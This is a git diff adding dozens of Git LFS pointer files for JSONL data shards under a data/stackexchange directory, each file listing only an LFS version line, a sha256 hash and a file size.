0000000000000000000000000000000000000000..bb883a0884ebbc33aa6ff880f97c3537ee772744 --- /dev/null +++ b/data/stackexchange/1-1/2080_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:df4cc428e65c716d5dcdf0b06b8f2f8def6f8941df4ab8fd8c4d3df949437529 +size 39213886 diff --git a/data/stackexchange/1-1/2081_2289.jsonl b/data/stackexchange/1-1/2081_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9f656ed0f0f4bff17d772bcc6c6fd898d117e988 --- /dev/null +++ b/data/stackexchange/1-1/2081_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:78b6f3ae2c66cc3810825ce853ae58748dfb51ec10d59f16058b5c97a8cdc7b5 +size 38933053 diff --git a/data/stackexchange/1-1/2082_2289.jsonl b/data/stackexchange/1-1/2082_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ec9c8797c14e1cc7f1c4dfe74bbff91184022c2a --- /dev/null +++ b/data/stackexchange/1-1/2082_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e422ca707586788b933fc1ce33e16c2ceadafafd41d63218b6c928af319158ff +size 39128936 diff --git a/data/stackexchange/1-1/2083_2289.jsonl b/data/stackexchange/1-1/2083_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1bd1397282dae5ace645f8f1fe34e5de6a8456d4 --- /dev/null +++ b/data/stackexchange/1-1/2083_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1894ae1b164843e0de5ae421e273d4fffde76180512a07b9195c22a06f83e166 +size 39739985 diff --git a/data/stackexchange/1-1/2084_2289.jsonl b/data/stackexchange/1-1/2084_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5c414bfb373c85374696c57db993824aa5474408 --- /dev/null +++ b/data/stackexchange/1-1/2084_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:be2e3683376b5c6467154c57ce997ec1330ece53f5063a82758368b43d4fe196 +size 39248308 diff --git a/data/stackexchange/1-1/2085_2289.jsonl b/data/stackexchange/1-1/2085_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9e86acd84d99fe0fb1f49b4c9acdc6102554a23b --- /dev/null +++ b/data/stackexchange/1-1/2085_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3649852affacb47f1b31bcffa57f0c6aa7b8b5b9b9f3614117b177dc7484d0c9 +size 39755634 diff --git a/data/stackexchange/1-1/2086_2289.jsonl b/data/stackexchange/1-1/2086_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0de67334f0c5981036beb205e8884604b44ed604 --- /dev/null +++ b/data/stackexchange/1-1/2086_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:6b51b0b7407e2f329c57bc3f49f011e4d8a2a0a5a9b5c9c705899ffb7ee54ab0 +size 38701199 diff --git a/data/stackexchange/1-1/2087_2289.jsonl b/data/stackexchange/1-1/2087_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..013b624f152b1ed88b95282636c336c6174c4482 --- /dev/null +++ b/data/stackexchange/1-1/2087_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8fa6296b2ab4de1382fe220616fe4bf55ab7bce464c166ea27ec00ef036aa7cb +size 39539858 diff --git a/data/stackexchange/1-1/2088_2289.jsonl b/data/stackexchange/1-1/2088_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..05728a8acf8ed9d27509681084b9c2361119833b --- /dev/null +++ b/data/stackexchange/1-1/2088_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:274fce95bc11934bd0db7be360bd9e1dc369971b65fb8ddba0c1c537e8744c5d +size 38929564 diff --git a/data/stackexchange/1-1/2089_2289.jsonl b/data/stackexchange/1-1/2089_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d5f08884b8152da0295ec203fd6464434002653d --- /dev/null +++ b/data/stackexchange/1-1/2089_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3f5e3828269b49b8b723860a0802eef8a2deb62478e6810a2f8353ed37f092e0 +size 35566589 diff --git a/data/stackexchange/1-1/208_2289.jsonl b/data/stackexchange/1-1/208_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..686699c68fe4bfa397510be7094982350edb904d --- /dev/null +++ b/data/stackexchange/1-1/208_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a26bc6ce02d80f633eb690bfb7ef846d255a31b121219ec2599c344962b78c0e +size 39031944 diff --git a/data/stackexchange/1-1/2090_2289.jsonl b/data/stackexchange/1-1/2090_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..bd082654002226e8129a650559747f93fe78e9ca --- /dev/null +++ b/data/stackexchange/1-1/2090_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c1da8ed889a5f955e8d385f6121d93ab5afb28b94c9979d96e2aa8f462aaf329 +size 34537172 diff --git a/data/stackexchange/1-1/2091_2289.jsonl b/data/stackexchange/1-1/2091_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..443d9519c0000fa58a40f3d9de321ed66e003693 --- /dev/null +++ b/data/stackexchange/1-1/2091_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:dcbb677665650fe28fc738dee1ccfb57f9c391fe864370f3dd8798bc530d010a +size 35131530 diff --git a/data/stackexchange/1-1/2092_2289.jsonl b/data/stackexchange/1-1/2092_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..50bd94b2889f746d881f691022ae9eaed8524154 --- /dev/null +++ b/data/stackexchange/1-1/2092_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c716171a64a674a8a0ce3656c7080cd06fe92df5acaf388175431d6e8b1f8fcc +size 34983821 diff --git a/data/stackexchange/1-1/2093_2289.jsonl b/data/stackexchange/1-1/2093_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..653d8e65e5ae922b9f3e7f58f5bd1e697e438ce8 --- /dev/null +++ b/data/stackexchange/1-1/2093_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c26a00a924212bfd90e522c2ec23cf0c15597cfad1656b0b156cc6f664696dfa +size 34944133 diff --git a/data/stackexchange/1-1/2094_2289.jsonl b/data/stackexchange/1-1/2094_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..bcdbdb53754a191015f87dc097603aff65b5bb0c --- /dev/null +++ b/data/stackexchange/1-1/2094_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6b0408177747326c82b23c9df334c9480963fa28e571be6a75c818a82552e7d0 +size 34671985 diff --git a/data/stackexchange/1-1/2095_2289.jsonl b/data/stackexchange/1-1/2095_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1ef960a56fabfe959d1581745567a7fd60305fb3 --- /dev/null +++ b/data/stackexchange/1-1/2095_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d1622654c4347af041840ade4f5fae34d46c3e5c4a25eb55ae52eae9edc2fa55 +size 35042852 diff --git a/data/stackexchange/1-1/2096_2289.jsonl b/data/stackexchange/1-1/2096_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..530e711992cfb9ac5163eea65229976eb88c7fe1 --- /dev/null +++ b/data/stackexchange/1-1/2096_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f4b27e65585a84bf78946a4ebf633d1c253cf2000cb30573420245a6d38a3d12 +size 34968999 diff --git a/data/stackexchange/1-1/2097_2289.jsonl b/data/stackexchange/1-1/2097_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9100dc309ad3ae7cffb92a8a2c1c6a487d5b86be --- /dev/null +++ b/data/stackexchange/1-1/2097_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:af0c67aec6f19a23e39ce217bbdb85d5e137faaad4240c2cbaa716f4ea8e9a6c +size 34555254 diff --git a/data/stackexchange/1-1/2098_2289.jsonl b/data/stackexchange/1-1/2098_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ffb796034f773f8aec31dc2622e9cdbca6df7f27 --- /dev/null +++ b/data/stackexchange/1-1/2098_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0824c3e7704678a1e8ec700c92957d31cce118409d7d9c8e2feeb6862ce65687 +size 34480542 diff --git a/data/stackexchange/1-1/2099_2289.jsonl b/data/stackexchange/1-1/2099_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3042b86ab52c14d2f98dde648d9a2e4e1c89e908 --- /dev/null +++ b/data/stackexchange/1-1/2099_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bb46b39e04946bd9cb8ad06d233711c42b81b0115f7153da77e96478f0690085 +size 34783617 diff --git a/data/stackexchange/1-1/209_2289.jsonl b/data/stackexchange/1-1/209_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7a0cc69b9e97d434e6bb0e4ab28ec945c92158fa --- /dev/null +++ b/data/stackexchange/1-1/209_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:34c79d66fb6cab578a66a5667e39695d87a4c61d95b8011bd4572041daa7020a +size 38052676 diff --git a/data/stackexchange/1-1/20_2289.jsonl b/data/stackexchange/1-1/20_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0873fc9a074309a059da5eab073e85c00d0c0df0 --- /dev/null +++ b/data/stackexchange/1-1/20_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f632a66f5986384ac209a3749b6cc7f6a35a98759fb51d49d648ee16a8f0b43a +size 35964262 diff --git a/data/stackexchange/1-1/2100_2289.jsonl b/data/stackexchange/1-1/2100_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..54b7c71e8516fdd91600ff0103ef62f738b774f6 --- /dev/null +++ b/data/stackexchange/1-1/2100_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:8fe21e082c23d462a0ef4cdc5a2e8fe43e177703f44159a157692f8365afba8f +size 34894901 diff --git a/data/stackexchange/1-1/2101_2289.jsonl b/data/stackexchange/1-1/2101_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..af1765870c8679af673a7b2fa8fcb3a4b67e4e0b --- /dev/null +++ b/data/stackexchange/1-1/2101_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:413d7fc44690ee50e796b96097f26f3a92447ed974e0f691c9da4474b496b160 +size 35006323 diff --git a/data/stackexchange/1-1/2102_2289.jsonl b/data/stackexchange/1-1/2102_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2847bd5e2b8387ce1e3b64b963c9ada3daa07a47 --- /dev/null +++ b/data/stackexchange/1-1/2102_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:37940b98fab84ecaf2eb0988e8dae017e49c051720772d37261a8ef6b49d838d +size 34769775 diff --git a/data/stackexchange/1-1/2103_2289.jsonl b/data/stackexchange/1-1/2103_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..15578787e3da655f2e46ce8973796fbbd29b1061 --- /dev/null +++ b/data/stackexchange/1-1/2103_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ce89f2e7a67cbb3cf37d4784731558e92e776257425e562b4267f31dd561747f +size 34898702 diff --git a/data/stackexchange/1-1/2104_2289.jsonl b/data/stackexchange/1-1/2104_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2f88685757c7225b9f0fe5dc266465149e98c895 --- /dev/null +++ b/data/stackexchange/1-1/2104_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:83596f8a9fd56faece341cfc418223b3230e96aed3489aec5838fbc573811ec7 +size 34720139 diff --git a/data/stackexchange/1-1/2105_2289.jsonl b/data/stackexchange/1-1/2105_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..39c4b534346410f742c09d13ac660e5a6fb90e13 --- /dev/null +++ b/data/stackexchange/1-1/2105_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:baf257ad19ac5c6cc42185e9b7b5cd224e6185cf25223ede40c85fc3482101e9 +size 34610113 diff --git a/data/stackexchange/1-1/2106_2289.jsonl b/data/stackexchange/1-1/2106_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..595f965555e60cbe56b63dbb8663dc6993d1fce9 --- /dev/null +++ b/data/stackexchange/1-1/2106_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e816198700fe54b6336da9eade0a45f8a1bf3c00c4bc1043e14a98dc9bf91a9c +size 34547105 diff --git a/data/stackexchange/1-1/2107_2289.jsonl b/data/stackexchange/1-1/2107_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7ebecd3a50c04c97cea68d80d88cd0dee74b2a85 --- /dev/null +++ b/data/stackexchange/1-1/2107_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2d05af955569aac711de6e7893f20be0bd5c108c52c88f9a5aa00231986844f4 +size 34747882 diff --git a/data/stackexchange/1-1/2108_2289.jsonl b/data/stackexchange/1-1/2108_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..661ecbd16d385b6bdd8e8b1ed0ce6bf6f91f6f34 --- /dev/null +++ b/data/stackexchange/1-1/2108_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3fc7bcc91ba50a93f2fefea4af88b56e78876b62892288784815aa54fd6addfb +size 34571863 diff --git a/data/stackexchange/1-1/2109_2289.jsonl b/data/stackexchange/1-1/2109_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..0879b9e8a4ee61e4677d0ee7cc20713c62a9fce7 --- /dev/null +++ b/data/stackexchange/1-1/2109_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ad679bf02d5194f53d037dbb6c288b55f325d65510c6e5601391a178bbb312b4 +size 35062449 diff --git a/data/stackexchange/1-1/210_2289.jsonl b/data/stackexchange/1-1/210_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0495b6400b7850b95ff8c71a27ddf2af14aeacda --- /dev/null +++ b/data/stackexchange/1-1/210_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b9916da6f796c01b9e8e14cf84f8553dc7a7d9963b5ce5757cdd206e822dad83 +size 38230225 diff --git a/data/stackexchange/1-1/2110_2289.jsonl b/data/stackexchange/1-1/2110_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7c86515c9e82591c565c4b3d4c8f7b5495c73a7e --- /dev/null +++ b/data/stackexchange/1-1/2110_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d21e858a37f570f77286ac3ce7df915ff2ed4c1fe689fc3e39beae6b300fcdeb +size 34911710 diff --git a/data/stackexchange/1-1/2111_2289.jsonl b/data/stackexchange/1-1/2111_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8ac6f7d7033904e20ad03732395c19148fc9380f --- /dev/null +++ b/data/stackexchange/1-1/2111_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4f6cadc707cd57f2616b130d735a6926a420feac3e09b161f078c9b2f75792dd +size 34771213 diff --git a/data/stackexchange/1-1/2112_2289.jsonl b/data/stackexchange/1-1/2112_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9202d4e982fd066a9377801eb9d7fa59229b3a5a --- /dev/null +++ b/data/stackexchange/1-1/2112_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:be28eaa4274e88a30f2878fc15bda1ae18862b19b1694428617dc8062ac7694c +size 34373128 diff --git a/data/stackexchange/1-1/2113_2289.jsonl b/data/stackexchange/1-1/2113_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..69abb87dc799c7ae2c73efaec572129d71b7d56b --- /dev/null +++ b/data/stackexchange/1-1/2113_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ddcea3c7aa210904c89f4eaaa37ad2a6b1864b9eefff6f8acec91029aacdf1a6 +size 34881228 diff --git a/data/stackexchange/1-1/2114_2289.jsonl b/data/stackexchange/1-1/2114_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b5e838693ebea77632be5c1797eb06381f66bd9b --- /dev/null +++ b/data/stackexchange/1-1/2114_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d4ba7a2e4aa4d217f282caa2673435082c1c910e7b0ad94fa9de45fe9c4dd5ab +size 34412996 diff --git a/data/stackexchange/1-1/2115_2289.jsonl b/data/stackexchange/1-1/2115_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6f5295c1f0703cf33c8e2d367864d7ed1b9ea823 --- /dev/null +++ b/data/stackexchange/1-1/2115_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0037b523d2a6405fd3e23aa4a2413dfe9454dce0d4c7e11c14db9879587604ca +size 34326918 diff --git a/data/stackexchange/1-1/2116_2289.jsonl b/data/stackexchange/1-1/2116_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5d8d350e414a7afeb183a5ff38b8fd3bad72aef6 --- /dev/null +++ b/data/stackexchange/1-1/2116_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:bfc15d0a7be9c96c6bff5b6857522427966a39de7ce32bea5c8fbb185657e7b0 +size 34520290 diff --git a/data/stackexchange/1-1/2117_2289.jsonl b/data/stackexchange/1-1/2117_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..96f3d50c985f9425855dc20586dffc5b21b261f7 --- /dev/null +++ b/data/stackexchange/1-1/2117_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:387afe1d933bb9a109b0768bf4194029b88614f5dab12dec6d28028634623908 +size 35003473 diff --git a/data/stackexchange/1-1/2118_2289.jsonl b/data/stackexchange/1-1/2118_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..97a2fc1b50a976e04fa3d92c66eaddd762089ef5 --- /dev/null +++ b/data/stackexchange/1-1/2118_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8110c343987305d49c9f5ac79151046c298d4782b6a9c3832b85c74cc7e7d0b8 +size 35037725 diff --git a/data/stackexchange/1-1/2119_2289.jsonl b/data/stackexchange/1-1/2119_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4dcd14f3071a2f3dfb3072dfa97e45cb30984a6e --- /dev/null +++ b/data/stackexchange/1-1/2119_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8b02006668d145ebe425358990ca2416f4125a98b427510e7031bbf3e3b3aaa4 +size 34673713 diff --git a/data/stackexchange/1-1/211_2289.jsonl b/data/stackexchange/1-1/211_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..45287526c3e7d81c1f9e8fe94870b62efaffe65e --- /dev/null +++ b/data/stackexchange/1-1/211_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:aebdee8d609dd3e8761b1f5110675743cb0efa59a66a8f994cf0af86ed6c99dc +size 37260633 diff --git a/data/stackexchange/1-1/2120_2289.jsonl b/data/stackexchange/1-1/2120_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2e20b049fdd137b63bffede88cc29b97214468bb --- /dev/null +++ b/data/stackexchange/1-1/2120_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5db5cc12e3f8743274c6a1ac54682f21e9467b84f22ea3cb10c44f7beea8c6be +size 35076154 diff --git a/data/stackexchange/1-1/2121_2289.jsonl b/data/stackexchange/1-1/2121_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ff94c25c58f90a24d1f1808d885921cc1ea5b4ee --- /dev/null +++ b/data/stackexchange/1-1/2121_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2d09c971bb1dca8a66a75b47565cc835ce437755c7a0b3e06cb4315a786f5c61 +size 34462112 diff --git a/data/stackexchange/1-1/2122_2289.jsonl b/data/stackexchange/1-1/2122_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4fe1634c22de280fb5752e909e270f81bf6ce456 --- /dev/null +++ b/data/stackexchange/1-1/2122_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:53f3cec55597cb47da575590a752ed26ffa6f926b3f9c150efe257d45701b3e5 +size 35039037 diff --git a/data/stackexchange/1-1/2123_2289.jsonl b/data/stackexchange/1-1/2123_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5d120be1108b109d74512696bdd815096fb3a7e6 --- /dev/null +++ b/data/stackexchange/1-1/2123_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8e450d705a8e23db50bbf4d0a7c8f5eba0f19918cf5191a8538e691508f3e845 +size 35068599 diff --git a/data/stackexchange/1-1/2124_2289.jsonl b/data/stackexchange/1-1/2124_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..86eb07a221406cb348582b915dc1a43b1d617d8b --- /dev/null +++ b/data/stackexchange/1-1/2124_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:edbf44500f010d3b8c69e5de828a94454e78f9c34b644bd8888195a04a139206 +size 34839543 diff --git a/data/stackexchange/1-1/2125_2289.jsonl b/data/stackexchange/1-1/2125_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1ef0f1e26e0898a0ddd9447ff334a195d0982827 --- /dev/null +++ b/data/stackexchange/1-1/2125_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:eb7602c2304091038f1c8ba9dce1fbc9091b7e8195f4fbcac02996f72e2ce187 +size 34734888 diff --git a/data/stackexchange/1-1/2126_2289.jsonl b/data/stackexchange/1-1/2126_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..88a6cdcffe41caf1e4613f3ab70c7542907e5909 --- /dev/null +++ b/data/stackexchange/1-1/2126_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bdedc0e9a1b8148dc94c88faec6738f3cad2ba46c982c4f9d8e73b6d5b4222fe +size 34756092 diff --git a/data/stackexchange/1-1/2127_2289.jsonl b/data/stackexchange/1-1/2127_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e0832d2c20ccd9a54631a167b16c0ff555b78ec4 --- /dev/null +++ b/data/stackexchange/1-1/2127_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1630a1c7b27a200c61267cae69e8fb1316470568a2901077a0198857550e2a75 +size 35198379 diff --git a/data/stackexchange/1-1/2128_2289.jsonl b/data/stackexchange/1-1/2128_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..192c2af3729b8ccea5304a3fc7ae9684a4776764 --- /dev/null +++ b/data/stackexchange/1-1/2128_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c2f2877602cf229202444232905046add68224a6fc9a9095024c3cd9706ae8a0 +size 34933015 diff --git a/data/stackexchange/1-1/2129_2289.jsonl b/data/stackexchange/1-1/2129_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a7d786cc7f2119fd5cc82160281104317015ada6 --- /dev/null +++ b/data/stackexchange/1-1/2129_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:94f3c690da79c1a1e531525f21a7df749d47b62fca117a210e9fff8e90408a36 +size 34506115 diff --git a/data/stackexchange/1-1/212_2289.jsonl b/data/stackexchange/1-1/212_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b148bf2db513554b69afc29d0db4a2b27ddf56d9 --- /dev/null +++ b/data/stackexchange/1-1/212_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ecab710bb7e6185e5f7dfad6645d03af0ab854e5333a50e1e9852df9e9005ea6 +size 37835790 diff --git a/data/stackexchange/1-1/2130_2289.jsonl b/data/stackexchange/1-1/2130_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ab9634369c3e101a7a392993e1d4a5879bef40e6 --- /dev/null +++ b/data/stackexchange/1-1/2130_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8ec0165e2e861bc44a3f4fe939fc350d65105eb54a6ecfd80b9cc9eac5029b2e +size 34560330 diff --git a/data/stackexchange/1-1/2131_2289.jsonl b/data/stackexchange/1-1/2131_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..787ef1aa1c44baad1e8221b70716932e75c0d810 --- /dev/null +++ b/data/stackexchange/1-1/2131_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:41c3d5c1295e77146a87ea534052266423d85ca74c40970275b948bf9822839e +size 35071810 diff --git a/data/stackexchange/1-1/2132_2289.jsonl b/data/stackexchange/1-1/2132_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6f16432bd36f0b653aa659ba68f8b8272d28811c --- /dev/null +++ b/data/stackexchange/1-1/2132_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:39bda9fe84cd5f7b34f841c90351db09549a5cf02ef650033901c6fe0ccd0059 +size 34176742 diff --git a/data/stackexchange/1-1/2133_2289.jsonl b/data/stackexchange/1-1/2133_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2ff16ffe14aa1c9178dc02fe99ceff187492f026 --- /dev/null +++ b/data/stackexchange/1-1/2133_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1acfe8f61238a32d6a17153be87047a86693973690c207cec3665d9275096f60 +size 34455681 diff --git a/data/stackexchange/1-1/2134_2289.jsonl b/data/stackexchange/1-1/2134_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2091e619d4b4c8af436f9648b7bffade2405fb0c --- /dev/null +++ b/data/stackexchange/1-1/2134_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bee0e5ac57836bec1b987626484952a41570ea6a744e6a8cc861fb398b951546 +size 34694951 diff --git a/data/stackexchange/1-1/2135_2289.jsonl b/data/stackexchange/1-1/2135_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4b798b2f19b8d1d716300a00e934b030e460813b --- /dev/null +++ b/data/stackexchange/1-1/2135_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c7964fb322199fb7df581d2cb03688c1fa729807135d920afd52794471f334e8 +size 35260946 diff --git a/data/stackexchange/1-1/2136_2289.jsonl b/data/stackexchange/1-1/2136_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3a53aba3f3298482bb5a6ea9676d21b350f1e7c3 --- /dev/null +++ b/data/stackexchange/1-1/2136_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:378bd9dbd423cc679b2402f021c5b0be42061311c5ced447677dc386863efd4e +size 35001900 diff --git a/data/stackexchange/1-1/2137_2289.jsonl b/data/stackexchange/1-1/2137_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b324931fe6cfe748a6190a9b06f5dc962a134ca5 --- /dev/null +++ b/data/stackexchange/1-1/2137_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5091113a0e6cc1137a983ec11106d54be1e7f8cd67da77a15f80a63a2e5a3865 +size 34932595 diff --git a/data/stackexchange/1-1/2138_2289.jsonl b/data/stackexchange/1-1/2138_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..aaf52d15fc92bfb932f91b6a7dea07ce05dc0a61 --- /dev/null +++ b/data/stackexchange/1-1/2138_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f71562e899037c4b922ce306acfb09250419a194e306fc0589a24b7e51f709db +size 34954580 diff --git a/data/stackexchange/1-1/2139_2289.jsonl b/data/stackexchange/1-1/2139_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9329f714c2b02d07aab3098d390c97b1c09d72a0 --- /dev/null 